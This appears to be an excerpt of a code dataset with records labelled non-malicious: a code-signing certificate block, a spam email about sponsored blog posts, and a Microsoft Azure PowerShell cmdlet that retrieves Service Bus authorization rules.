// SIG // aWNyb3NvZnQgQ29kZSBTaWduaW5nIFBDQTAeFw0xNTA2
// SIG // MDQxNzQyNDVaFw0xNjA5MDQxNzQyNDVaMIGDMQswCQYD
// SIG // VQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4G
// SIG // A1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0
// SIG // IENvcnBvcmF0aW9uMQ0wCwYDVQQLEwRNT1BSMR4wHAYD
// SIG // VQQDExVNaWNyb3NvZnQgQ29ycG9yYXRpb24wggEiMA0G
// SIG // CSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCS/G82u+ED
// SIG // uSjWRtGiYbqlRvtjFj4u+UfSx+ztx5mxJlF1vdrMDwYU
// SIG // EaRsGZ7AX01UieRNUNiNzaFhpXcTmhyn7Q1096dWeego
// SIG // 91PSsXpj4PWUl7fs2Uf4bD3zJYizvArFBKeOfIVIdhxh
// SIG // RqoZxHpii8HCNar7WG/FYwuTSTCBG3vff3xPtEdtX3gc
// SIG // r7b3lhNS77nRTTnlc95ITjwUqpcNOcyLUeFc0Tvwjmfq
// SIG // MGCpTVqdQ73bI7rAD9dLEJ2cTfBRooSq5JynPdaj7woY
// SIG // SKj6sU6lmA5Lv/AU8wDIsEjWW/4414kRLQW6QwJPIgCW
// SIG // Ja19NW6EaKsgGDgo/hyiELGlAgMBAAGjggFgMIIBXDAT
// SIG // BgNVHSUEDDAKBggrBgEFBQcDAzAdBgNVHQ4EFgQUif4K
// SIG // MeomzeZtx5GRuZSMohhhNzQwUQYDVR0RBEowSKRGMEQx
// SIG // DTALBgNVBAsTBE1PUFIxMzAxBgNVBAUTKjMxNTk1KzA0
// SIG // MDc5MzUwLTE2ZmEtNGM2MC1iNmJmLTlkMmIxY2QwNTk4
// SIG // NDAfBgNVHSMEGDAWgBTLEejK0rQWWAHJNy4zFha5TJoK
// SIG // HzBWBgNVHR8ETzBNMEugSaBHhkVodHRwOi8vY3JsLm1p
// SIG // Y3Jvc29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9NaWND
// SIG // b2RTaWdQQ0FfMDgtMzEtMjAxMC5jcmwwWgYIKwYBBQUH
// SIG // AQEETjBMMEoGCCsGAQUFBzAChj5odHRwOi8vd3d3Lm1p
// SIG // Y3Jvc29mdC5jb20vcGtpL2NlcnRzL01pY0NvZFNpZ1BD
// SIG // QV8wOC0zMS0yMDEwLmNydDANBgkqhkiG9w0BAQUFAAOC
// SIG // AQEApqhTkd87Af5hXQZa62bwDNj32YTTAFEOENGk0Rco
// SIG // 54wzOCvYQ8YDi3XrM5L0qeJn/QLbpR1OQ0VdG0nj4E8W
// SIG // 8H6P8IgRyoKtpPumqV/1l2DIe8S/fJtp7R+CwfHNjnhL
// SIG // YvXXDRzXUxLWllLvNb0ZjqBAk6EKpS0WnMJGdAjr2/TY
// SIG // pUk2VBIRVQOzexb7R/77aPzARVziPxJ5M6LvgsXeQBkH
// SIG // 7hXFCptZBUGp0JeegZ4DW/xK4xouBaxQRy+M+nnYHiD4
// SIG // BfspaxgU+nIEtwunmmTsEV1PRUmNKRot+9C2CVNfNJTg
// SIG // FsS56nM16Ffv4esWwxjHBrM7z2GE4rZEiZSjhjCCBbww
// SIG // ggOkoAMCAQICCmEzJhoAAAAAADEwDQYJKoZIhvcNAQEF
// SIG // BQAwXzETMBEGCgmSJomT8ixkARkWA2NvbTEZMBcGCgmS
// SIG // JomT8ixkARkWCW1pY3Jvc29mdDEtMCsGA1UEAxMkTWlj
// SIG // cm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5
// SIG // MB4XDTEwMDgzMTIyMTkzMloXDTIwMDgzMTIyMjkzMlow
// SIG // eTELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0
// SIG // b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1p
// SIG // Y3Jvc29mdCBDb3Jwb3JhdGlvbjEjMCEGA1UEAxMaTWlj
// SIG // cm9zb2Z0IENvZGUgU2lnbmluZyBQQ0EwggEiMA0GCSqG
// SIG // SIb3DQEBAQUAA4IBDwAwggEKAoIBAQCycllcGTBkvx2a
// SIG // YCAgQpl2U2w+G9ZvzMvx6mv+lxYQ4N86dIMaty+gMuz/
// SIG // 3sJCTiPVcgDbNVcKicquIEn08GisTUuNpb15S3GbRwfa
// SIG // /SXfnXWIz6pzRH/XgdvzvfI2pMlcRdyvrT3gKGiXGqel
// SIG // cnNW8ReU5P01lHKg1nZfHndFg4U4FtBzWwW6Z1KNpbJp
// SIG // L9oZC/6SdCnidi9U3RQwWfjSjWL9y8lfRjFQuScT5EAw
// SIG // z3IpECgixzdOPaAyPZDNoTgGhVxOVoIoKgUyt0vXT2Pn
// SIG // 0i1i8UU956wIAPZGoZ7RW4wmU+h6qkryRs83PDietHdc
// SIG // pReejcsRj1Y8wawJXwPTAgMBAAGjggFeMIIBWjAPBgNV
// SIG // HRMBAf8EBTADAQH/MB0GA1UdDgQWBBTLEejK0rQWWAHJ
// SIG // Ny4zFha5TJoKHzALBgNVHQ8EBAMCAYYwEgYJKwYBBAGC
// SIG // NxUBBAUCAwEAATAjBgkrBgEEAYI3FQIEFgQU/dExTtMm
// SIG // ipXhmGA7qDFvpjy82C0wGQYJKwYBBAGCNxQCBAweCgBT
// SIG // AHUAYgBDAEEwHwYDVR0jBBgwFoAUDqyCYEBWJ5flJRP8
// SIG // KuEKU5VZ5KQwUAYDVR0fBEkwRzBFoEOgQYY/aHR0cDov
// SIG // L2NybC5taWNyb3NvZnQuY29tL3BraS9jcmwvcHJvZHVj
// SIG // dHMvbWljcm9zb2Z0cm9vdGNlcnQuY3JsMFQGCCsGAQUF
// SIG // BwEBBEgwRjBEBggrBgEFBQcwAoY4aHR0cDovL3d3dy5t
// SIG // aWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNyb3NvZnRS
// SIG // b290Q2VydC5jcnQwDQYJKoZIhvcNAQEFBQADggIBAFk5
// SIG // Pn8mRq/rb0CxMrVq6w4vbqhJ9+tfde1MOy3XQ60L/svp
// SIG // LTGjI8x8UJiAIV2sPS9MuqKoVpzjcLu4tPh5tUly9z7q
// SIG // QX/K4QwXaculnCAt+gtQxFbNLeNK0rxw56gNogOlVuC4
// SIG // iktX8pVCnPHz7+7jhh80PLhWmvBTI4UqpIIck+KUBx3y
// SIG // 4k74jKHK6BOlkU7IG9KPcpUqcW2bGvgc8FPWZ8wi/1wd
// SIG // zaKMvSeyeWNWRKJRzfnpo1hW3ZsCRUQvX/TartSCMm78
// SIG // pJUT5Otp56miLL7IKxAOZY6Z2/Wi+hImCWU4lPF6H0q7
// SIG // 0eFW6NB4lhhcyTUWX92THUmOLb6tNEQc7hAVGgBd3TVb
// SIG // Ic6YxwnuhQ6MT20OE049fClInHLR82zKwexwo1eSV32U
// SIG // jaAbSANa98+jZwp0pTbtLS8XyOZyNxL0b7E8Z4L5UrKN
// SIG // MxZlHg6K3RDeZPRvzkbU0xfpecQEtNP7LN8fip6sCvsT
// SIG // J0Ct5PnhqX9GuwdgR2VgQE6wQuxO7bN2edgKNAltHIAx
// SIG // H+IOVN3lofvlRxCtZJj/UBYufL8FIXrilUEnacOTj5XJ
// SIG // jdibIa4NXJzwoq6GaIMMai27dmsAHZat8hZ79haDJLmI
// SIG // z2qoRzEvmtzjcT3XAH5iR9HOiMm4GPoOco3Boz2vAkBq
// SIG // /2mbluIQqBC0N1AI1sM9MIIGBzCCA++gAwIBAgIKYRZo
// SIG // NAAAAAAAHDANBgkqhkiG9w0BAQUFADBfMRMwEQYKCZIm
// SIG // iZPyLGQBGRYDY29tMRkwFwYKCZImiZPyLGQBGRYJbWlj
// SIG // cm9zb2Z0MS0wKwYDVQQDEyRNaWNyb3NvZnQgUm9vdCBD
// SIG // ZXJ0aWZpY2F0ZSBBdXRob3JpdHkwHhcNMDcwNDAzMTI1
// SIG // MzA5WhcNMjEwNDAzMTMwMzA5WjB3MQswCQYDVQQGEwJV
// SIG // UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH
// SIG // UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBv
// SIG // cmF0aW9uMSEwHwYDVQQDExhNaWNyb3NvZnQgVGltZS1T
// SIG // dGFtcCBQQ0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAw
// SIG // ggEKAoIBAQCfoWyx39tIkip8ay4Z4b3i48WZUSNQrc7d
// SIG // GE4kD+7Rp9FMrXQwIBHrB9VUlRVJlBtCkq6YXDAm2gBr
// SIG // 6Hu97IkHD/cOBJjwicwfyzMkh53y9GccLPx754gd6udO
// SIG // o6HBI1PKjfpFzwnQXq/QsEIEovmmbJNn1yjcRlOwhtDl
// SIG // KEYuJ6yGT1VSDOQDLPtqkJAwbofzWTCd+n7Wl7PoIZd+
// SIG // +NIT8wi3U21StEWQn0gASkdmEScpZqiX5NMGgUqi+YSn
// SIG // EUcUCYKfhO1VeP4Bmh1QCIUAEDBG7bfeI0a7xC1Un68e
// SIG // eEExd8yb3zuDk6FhArUdDbH895uyAc4iS1T/+QXDwiAL
// SIG // AgMBAAGjggGrMIIBpzAPBgNVHRMBAf8EBTADAQH/MB0G
// SIG // A1UdDgQWBBQjNPjZUkZwCu1A+3b7syuwwzWzDzALBgNV
// SIG // HQ8EBAMCAYYwEAYJKwYBBAGCNxUBBAMCAQAwgZgGA1Ud
// SIG // IwSBkDCBjYAUDqyCYEBWJ5flJRP8KuEKU5VZ5KShY6Rh
// SIG // MF8xEzARBgoJkiaJk/IsZAEZFgNjb20xGTAXBgoJkiaJ
// SIG // k/IsZAEZFgltaWNyb3NvZnQxLTArBgNVBAMTJE1pY3Jv
// SIG // c29mdCBSb290IENlcnRpZmljYXRlIEF1dGhvcml0eYIQ
// SIG // ea0WoUqgpa1Mc1j0BxMuZTBQBgNVHR8ESTBHMEWgQ6BB
// SIG // hj9odHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny
// SIG // bC9wcm9kdWN0cy9taWNyb3NvZnRyb290Y2VydC5jcmww
// SIG // VAYIKwYBBQUHAQEESDBGMEQGCCsGAQUFBzAChjhodHRw
// SIG // Oi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpL2NlcnRzL01p
// SIG // Y3Jvc29mdFJvb3RDZXJ0LmNydDATBgNVHSUEDDAKBggr
// SIG // BgEFBQcDCDANBgkqhkiG9w0BAQUFAAOCAgEAEJeKw1wD
// SIG // RDbd6bStd9vOeVFNAbEudHFbbQwTq86+e4+4LtQSooxt
// SIG // YrhXAstOIBNQmd16QOJXu69YmhzhHQGGrLt48ovQ7DsB
// SIG // 7uK+jwoFyI1I4vBTFd1Pq5Lk541q1YDB5pTyBi+FA+mR
// SIG // KiQicPv2/OR4mS4N9wficLwYTp2OawpylbihOZxnLcVR
// SIG // DupiXD8WmIsgP+IHGjL5zDFKdjE9K3ILyOpwPf+FChPf
// SIG // wgphjvDXuBfrTot/xTUrXqO/67x9C0J71FNyIe4wyrt4
// SIG // ZVxbARcKFA7S2hSY9Ty5ZlizLS/n+YWGzFFW6J1wlGys
// SIG // OUzU9nm/qhh6YinvopspNAZ3GmLJPR5tH4LwC8csu89D
// SIG // s+X57H2146SodDW4TsVxIxImdgs8UoxxWkZDFLyzs7BN
// SIG // Z8ifQv+AeSGAnhUwZuhCEl4ayJ4iIdBD6Svpu/RIzCzU
// SIG // 2DKATCYqSCRfWupW76bemZ3KOm+9gSd0BhHudiG/m4LB
// SIG // J1S2sWo9iaF2YbRuoROmv6pH8BJv/YoybLL+31HIjCPJ
// SIG // Zr2dHYcSZAI9La9Zj7jkIeW1sMpjtHhUBdRBLlCslLCl
// SIG // eKuzoJZ1GtmShxN1Ii8yqAhuoFuMJb+g74TKIdbrHk/J
// SIG // mu5J4PcBZW+JC33Iacjmbuqnl84xKf8OxVtc2E0bodj6
// SIG // L54/LlUWa8kTo/0xggSnMIIEowIBATCBkDB5MQswCQYD
// SIG // VQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4G
// SIG // A1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0
// SIG // IENvcnBvcmF0aW9uMSMwIQYDVQQDExpNaWNyb3NvZnQg
// SIG // Q29kZSBTaWduaW5nIFBDQQITMwAAAQosea7XeXumrAAB
// SIG // AAABCjAJBgUrDgMCGgUAoIHAMBkGCSqGSIb3DQEJAzEM
// SIG // BgorBgEEAYI3AgEEMBwGCisGAQQBgjcCAQsxDjAMBgor
// SIG // BgEEAYI3AgEVMCMGCSqGSIb3DQEJBDEWBBRvFp3hIAUI
// SIG // apyugnaiZMvlH+jG4jBgBgorBgEEAYI3AgEMMVIwUKA2
// SIG // gDQASQBnAG4AbwByAGUAVABlAGwAZQBtAGUAdAByAHkA
// SIG // UgBlAHAAbwByAHQAZQByAC4AagBzoRaAFGh0dHA6Ly9t
// SIG // aWNyb3NvZnQuY29tMA0GCSqGSIb3DQEBAQUABIIBAI3O
// SIG // RajmkCswJopfCy5Qn+hQYHr8iR6cn5RrBJsab+3ExJJ8
// SIG // Upj9P7jle6FEMs/XLEHsIgaJLgMyUttsy1UlLr1uHmvy
// SIG // V2UMMiHpvVDASQZwFqnTlX5D7qu1jzBt5q+2P2B5kjfo
// SIG // 9l/yXiUqO0z0wMZ1C6R60TCHr6rqY5Sg8GRri6RF2lUH
// SIG // G12SOxjJR1+b2OZFriH7iQa6voWJyTLMphSwcqkMT7fL
// SIG // d06YML6meKTtjQKmMUNRRVqhT3GIsOBRuZ/GALTXGXdH
// SIG // 1V0Wqy17L73ZCYeP/JTRSPpP5JIQweDm67GnKL5fR70q
// SIG // zaOZZ5kT0aZcMyNUTCv52u85P3fXkiahggIoMIICJAYJ
// SIG // KoZIhvcNAQkGMYICFTCCAhECAQEwgY4wdzELMAkGA1UE
// SIG // BhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNV
// SIG // BAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBD
// SIG // b3Jwb3JhdGlvbjEhMB8GA1UEAxMYTWljcm9zb2Z0IFRp
// SIG // bWUtU3RhbXAgUENBAhMzAAAAj9d2FbnNRYp0AAAAAACP
// SIG // MAkGBSsOAwIaBQCgXTAYBgkqhkiG9w0BCQMxCwYJKoZI
// SIG // hvcNAQcBMBwGCSqGSIb3DQEJBTEPFw0xNjAxMTUwMjA4
// SIG // MDBaMCMGCSqGSIb3DQEJBDEWBBTUb8yLcd8/uPLXg5AB
// SIG // FZONlsSyRDANBgkqhkiG9w0BAQUFAASCAQBHFsjaw9+D
// SIG // EJdTZExrU9cNilU45XNIFeXXzA8z21pPd4WvO592HPOj
// SIG // NASio4n6UatkjZRuXxItMC5Z4YWcLWWsiruLIdUBvp6Y
// SIG // H3UTChPaKwlhfvFqoIl+PgT16u+QgsoOXw++5U5VWYhz
// SIG // 37CbttHnDEY4HhZaoUi5NYYw6j094Sk8coVaSnK4dxc0
// SIG // v5oLq5u4i6eqYv5XlKjbcLzdPLWCmtFp/42KgW7GVIdX
// SIG // slhLkN9m7rGW7tNtUas7pNDuW5mQlzV0MVCpc5piPNyH
// SIG // YyC37Y1aJEXAYsB4IpoxYPtt53xNurpyVzWwDUTimWWQ
// SIG // C9RMMsuFB/De641gbkk0cevq
// SIG // End signature block
|
combined_dataset/train/non-malicious/Get-HtmlHelp_2.ps1
|
Get-HtmlHelp_2.ps1
|
Hello,
I may have contacted you in the past, but wanted to reach out again to inquire about the possibility of advertising on your blog in the form of sponsored guest posts.
Either I can have content written or you can write content that is relevant to your audience and helps to promote our client's service. We then pay for that post and the opportunity to have exposure to your readers.
Thank you,
-Brandon Murphy
brandon@submitdigital.com
www.SubmitDigital.com
http://huddledmasses.org
|
combined_dataset/train/non-malicious/sample_50_27.ps1
|
sample_50_27.ps1
|
# ----------------------------------------------------------------------------------
#
# Copyright Microsoft Corporation
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ----------------------------------------------------------------------------------
<#
.Synopsis
Gets the Authorization Rule of a ServiceBus namespace, queue or topic.
.Description
Gets the Authorization Rule of a ServiceBus namespace, queue or topic.
#>
function Get-AzServiceBusAuthorizationRule{
[OutputType([Microsoft.Azure.PowerShell.Cmdlets.ServiceBus.Models.ISbAuthorizationRule])]
[CmdletBinding(DefaultParameterSetName = 'GetExpandedNamespace', PositionalBinding = $false, ConfirmImpact = 'Medium')]
param(
[Parameter(ParameterSetName = 'GetExpandedQueue', HelpMessage = "The name of the Authorization Rule")]
[Parameter(ParameterSetName = 'GetExpandedTopic', HelpMessage = "The name of the Authorization Rule")]
[Parameter(ParameterSetName = 'GetExpandedNamespace', HelpMessage = "The name of the Authorization Rule")]
[Parameter(ParameterSetName = 'GetExpandedAlias', HelpMessage = "The name of the Authorization Rule")]
[Alias('AuthorizationRuleName')]
[Microsoft.Azure.PowerShell.Cmdlets.ServiceBus.Category('Path')]
[System.String]
# The name of the Authorization Rule.
${Name},
[Parameter(ParameterSetName = 'GetExpandedAlias', Mandatory, HelpMessage = "The name of the disaster recovery config")]
[Microsoft.Azure.PowerShell.Cmdlets.ServiceBus.Category('Path')]
[System.String]
# The name of the disaster recovery config
${AliasName},
[Parameter(ParameterSetName = 'GetExpandedQueue', Mandatory, HelpMessage = "The name of the Service Bus queue.")]
[Microsoft.Azure.PowerShell.Cmdlets.ServiceBus.Category('Path')]
[System.String]
# The name of the Service Bus queue.
${QueueName},
[Parameter(ParameterSetName = 'GetExpandedTopic', Mandatory, HelpMessage = "The name of the Service Bus topic.")]
[Microsoft.Azure.PowerShell.Cmdlets.ServiceBus.Category('Path')]
[System.String]
# The name of the Service Bus topic.
${TopicName},
[Parameter(ParameterSetName = 'GetExpandedNamespace', Mandatory, HelpMessage = "The name of ServiceBus namespace")]
[Parameter(ParameterSetName = 'GetExpandedQueue', Mandatory, HelpMessage = "The name of the ServiceBus namespace.")]
[Parameter(ParameterSetName = 'GetExpandedTopic', Mandatory, HelpMessage = "The name of the ServiceBus namespace.")]
[Parameter(ParameterSetName = 'GetExpandedAlias', Mandatory, HelpMessage = "The name of the ServiceBus namespace.")]
[Microsoft.Azure.PowerShell.Cmdlets.ServiceBus.Category('Path')]
[System.String]
# The name of ServiceBus namespace
${NamespaceName},
[Parameter(ParameterSetName = 'GetExpandedNamespace', Mandatory, HelpMessage = "The name of the resource group. The name is case insensitive.")]
[Parameter(ParameterSetName = 'GetExpandedQueue', Mandatory, HelpMessage = "The name of the resource group. The name is case insensitive.")]
[Parameter(ParameterSetName = 'GetExpandedTopic', Mandatory, HelpMessage = "The name of the resource group. The name is case insensitive.")]
[Parameter(ParameterSetName = 'GetExpandedAlias', Mandatory, HelpMessage = "The name of the resource group. The name is case insensitive.")]
[Microsoft.Azure.PowerShell.Cmdlets.ServiceBus.Category('Path')]
[System.String]
# The name of the resource group.
# The name is case insensitive.
${ResourceGroupName},
[Parameter(ParameterSetName = 'GetExpandedNamespace', HelpMessage = "The ID of the target subscription.")]
[Parameter(ParameterSetName = 'GetExpandedQueue', HelpMessage = "The ID of the target subscription.")]
[Parameter(ParameterSetName = 'GetExpandedTopic', HelpMessage = "The ID of the target subscription.")]
[Parameter(ParameterSetName = 'GetExpandedAlias', HelpMessage = "The ID of the target subscription.")]
[Microsoft.Azure.PowerShell.Cmdlets.ServiceBus.Category('Path')]
[Microsoft.Azure.PowerShell.Cmdlets.ServiceBus.Runtime.DefaultInfo(Script = '(Get-AzContext).Subscription.Id')]
[System.String[]]
# The ID of the target subscription.
${SubscriptionId},
[Parameter(ParameterSetName = 'GetViaIdentityExpanded', Mandatory, ValueFromPipeline, HelpMessage = "Identity parameter. To construct, see NOTES section for INPUTOBJECT properties and create a hash table.")]
[Microsoft.Azure.PowerShell.Cmdlets.ServiceBus.Category('Path')]
[Microsoft.Azure.PowerShell.Cmdlets.ServiceBus.Models.IServiceBusIdentity]
# Identity Parameter
# To construct, see NOTES section for INPUTOBJECT properties and create a hash table.
${InputObject},
[Parameter(HelpMessage = "The credentials, account, tenant, and subscription used for communication with Azure.")]
[Alias('AzureRMContext', 'AzureCredential')]
[ValidateNotNull()]
[Microsoft.Azure.PowerShell.Cmdlets.ServiceBus.Category('Azure')]
[System.Management.Automation.PSObject]
# The credentials, account, tenant, and subscription used for communication with Azure.
${DefaultProfile},
[Parameter(DontShow)]
[Microsoft.Azure.PowerShell.Cmdlets.ServiceBus.Category('Runtime')]
[System.Management.Automation.SwitchParameter]
# Wait for .NET debugger to attach
${Break},
[Parameter(DontShow)]
[ValidateNotNull()]
[Microsoft.Azure.PowerShell.Cmdlets.ServiceBus.Category('Runtime')]
[Microsoft.Azure.PowerShell.Cmdlets.ServiceBus.Runtime.SendAsyncStep[]]
# SendAsync Pipeline Steps to be appended to the front of the pipeline
${HttpPipelineAppend},
[Parameter(DontShow)]
[ValidateNotNull()]
[Microsoft.Azure.PowerShell.Cmdlets.ServiceBus.Category('Runtime')]
[Microsoft.Azure.PowerShell.Cmdlets.ServiceBus.Runtime.SendAsyncStep[]]
# SendAsync Pipeline Steps to be prepended to the front of the pipeline
${HttpPipelinePrepend},
[Parameter(DontShow)]
[Microsoft.Azure.PowerShell.Cmdlets.ServiceBus.Category('Runtime')]
[System.Uri]
# The URI for the proxy server to use
${Proxy},
[Parameter(DontShow)]
[ValidateNotNull()]
[Microsoft.Azure.PowerShell.Cmdlets.ServiceBus.Category('Runtime')]
[System.Management.Automation.PSCredential]
# Credentials for a proxy server to use for the remote call
${ProxyCredential},
[Parameter(DontShow)]
[Microsoft.Azure.PowerShell.Cmdlets.ServiceBus.Category('Runtime')]
[System.Management.Automation.SwitchParameter]
# Use the default credentials for the proxy
${ProxyUseDefaultCredentials}
)
process{
try{
$null = $PSBoundParameters.Remove('WhatIf')
$null = $PSBoundParameters.Remove('Confirm')
if ($PSCmdlet.ParameterSetName -eq 'GetExpandedNamespace') {
if(-not $PSBoundParameters.ContainsKey('Name')) {
Az.ServiceBus.private\Get-AzServiceBusNamespaceAuthorizationRule_List @PSBoundParameters
}
else {
Az.ServiceBus.private\Get-AzServiceBusNamespaceAuthorizationRule_Get @PSBoundParameters
}
}
elseif ($PSCmdlet.ParameterSetName -eq 'GetExpandedQueue'){
if (-not $PSBoundParameters.ContainsKey('Name')) {
Az.ServiceBus.private\Get-AzServiceBusQueueAuthorizationRule_List @PSBoundParameters
}
else {
Az.ServiceBus.private\Get-AzServiceBusQueueAuthorizationRule_Get @PSBoundParameters
}
}
elseif ($PSCmdlet.ParameterSetName -eq 'GetExpandedTopic'){
if (-not $PSBoundParameters.ContainsKey('Name')) {
Az.ServiceBus.private\Get-AzServiceBusTopicAuthorizationRule_List @PSBoundParameters
}
else {
Az.ServiceBus.private\Get-AzServiceBusTopicAuthorizationRule_Get @PSBoundParameters
}
}
elseif ($PSCmdlet.ParameterSetName -eq 'GetExpandedAlias'){
$null = $PSBoundParameters.Remove('AliasName')
if (-not $PSBoundParameters.ContainsKey('Name')) {
Az.ServiceBus.private\Get-AzServiceBusDisasterRecoveryConfigAuthorizationRule_List -Alias $AliasName @PSBoundParameters
}
else {
Az.ServiceBus.private\Get-AzServiceBusDisasterRecoveryConfigAuthorizationRule_Get -Alias $AliasName @PSBoundParameters
}
}
elseif ($PSCmdlet.ParameterSetName -eq 'GetViaIdentityExpanded'){
if($InputObject.Id -ne $null) {
$ResourceHashTable = ParseResourceId -ResourceId $InputObject.Id
}
else {
$ResourceHashTable = ParseResourceId -ResourceId $InputObject
}
if ($ResourceHashTable['QueueName'] -ne $null) {
Az.ServiceBus.private\Get-AzServiceBusQueueAuthorizationRule_GetViaIdentity @PSBoundParameters
}
elseif ($ResourceHashTable['TopicName'] -ne $null) {
Az.ServiceBus.private\Get-AzServiceBusTopicAuthorizationRule_GetViaIdentity @PSBoundParameters
}
elseif ($ResourceHashTable['AliasName'] -ne $null) {
Az.ServiceBus.private\Get-AzServiceBusDisasterRecoveryConfigAuthorizationRule_GetViaIdentity @PSBoundParameters
}
elseif ($ResourceHashTable['NamespaceName'] -ne $null) {
Az.ServiceBus.private\Get-AzServiceBusNamespaceAuthorizationRule_GetViaIdentity @PSBoundParameters
}
else {
throw 'Invalid -InputObject'
}
}
}
catch{
throw
}
}
}
function ParseResourceId{
param (
[string]$ResourceId
)
$array = $resourceID.ToLower().Split('/')
$indexSubscription = 0..($array.Length -1) | where {$array[$_] -eq 'subscriptions'}
$indexResourceGroup = 0..($array.Length -1) | where {$array[$_] -eq 'resourcegroups'}
$indexNamespace = 0..($array.Length -1) | where {$array[$_] -eq 'namespaces'}
$indexQueue = 0..($array.Length -1) | where {$array[$_] -eq 'queues'}
$indexTopic = 0..($array.Length -1) | where {$array[$_] -eq 'topics'}
$indexAlias = 0..($array.Length -1) | where {$array[$_] -eq 'disasterrecoveryconfigs'}
$indexAuthRule = 0..($array.Length -1) | where {$array[$_] -eq 'authorizationrules'}
if (($indexResourceGroup+1) > $array.Length){
throw 'Invalid -InputObject Id'
}
if (($indexNamespace+1) > $array.Length){
throw 'Invalid -InputObject Id'
}
$result = @{
'ResourceGroupName' = $array.get($indexResourceGroup+1)
'NamespaceName' = $array.get($indexNamespace+1)
}
if ($indexQueue -ne $null){
if (($indexQueue+1) > $array.Length){
throw 'Invalid -InputObject Id'
}
else{
$result.add('QueueName', $array.get($indexQueue+1))
}
}
if ($indexTopic -ne $null){
if (($indexTopic+1) > $array.Length){
throw 'Invalid -InputObject Id'
}
else{
$result.add('TopicName', $array.get($indexTopic+1))
}
}
if ($indexSubscription -ne $null){
if (($indexSubscription+1) > $array.Length){
throw 'Invalid -InputObject Id'
}
else{
$result.add('SubscriptionName', $array.get($indexSubscription+1))
}
}
if ($indexAuthRule -ne $null){
if (($indexAuthRule+1) > $array.Length){
throw 'Invalid -InputObject Id'
}
else{
$result.add('AuthorizationRuleName', $array.get($indexAuthRule+1))
}
}
if ($indexAlias -ne $null){
if (($indexAlias+1) > $array.Length){
throw 'Invalid -InputObject Id'
}
else{
$result.add('AliasName', $array.get($indexAlias+1))
}
}
return $result
}
# SIG # Begin signature block
# MIInzgYJKoZIhvcNAQcCoIInvzCCJ7sCAQExDzANBglghkgBZQMEAgEFADB5Bgor
# BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG
# KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCBcYB/znBVwNocw
# GaPCrHAlkaAd2FByfnoHgab9vzWQvKCCDYUwggYDMIID66ADAgECAhMzAAADri01
# UchTj1UdAAAAAAOuMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD
# VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p
# bmcgUENBIDIwMTEwHhcNMjMxMTE2MTkwODU5WhcNMjQxMTE0MTkwODU5WjB0MQsw
# CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u
# ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB
# AQD0IPymNjfDEKg+YyE6SjDvJwKW1+pieqTjAY0CnOHZ1Nj5irGjNZPMlQ4HfxXG
# yAVCZcEWE4x2sZgam872R1s0+TAelOtbqFmoW4suJHAYoTHhkznNVKpscm5fZ899
# QnReZv5WtWwbD8HAFXbPPStW2JKCqPcZ54Y6wbuWV9bKtKPImqbkMcTejTgEAj82
# 6GQc6/Th66Koka8cUIvz59e/IP04DGrh9wkq2jIFvQ8EDegw1B4KyJTIs76+hmpV
# M5SwBZjRs3liOQrierkNVo11WuujB3kBf2CbPoP9MlOyyezqkMIbTRj4OHeKlamd
# WaSFhwHLJRIQpfc8sLwOSIBBAgMBAAGjggGCMIIBfjAfBgNVHSUEGDAWBgorBgEE
# AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQUhx/vdKmXhwc4WiWXbsf0I53h8T8w
# VAYDVR0RBE0wS6RJMEcxLTArBgNVBAsTJE1pY3Jvc29mdCBJcmVsYW5kIE9wZXJh
# dGlvbnMgTGltaXRlZDEWMBQGA1UEBRMNMjMwMDEyKzUwMTgzNjAfBgNVHSMEGDAW
# gBRIbmTlUAXTgqoXNzcitW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8v
# d3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIw
# MTEtMDctMDguY3JsMGEGCCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDov
# L3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDEx
# XzIwMTEtMDctMDguY3J0MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIB
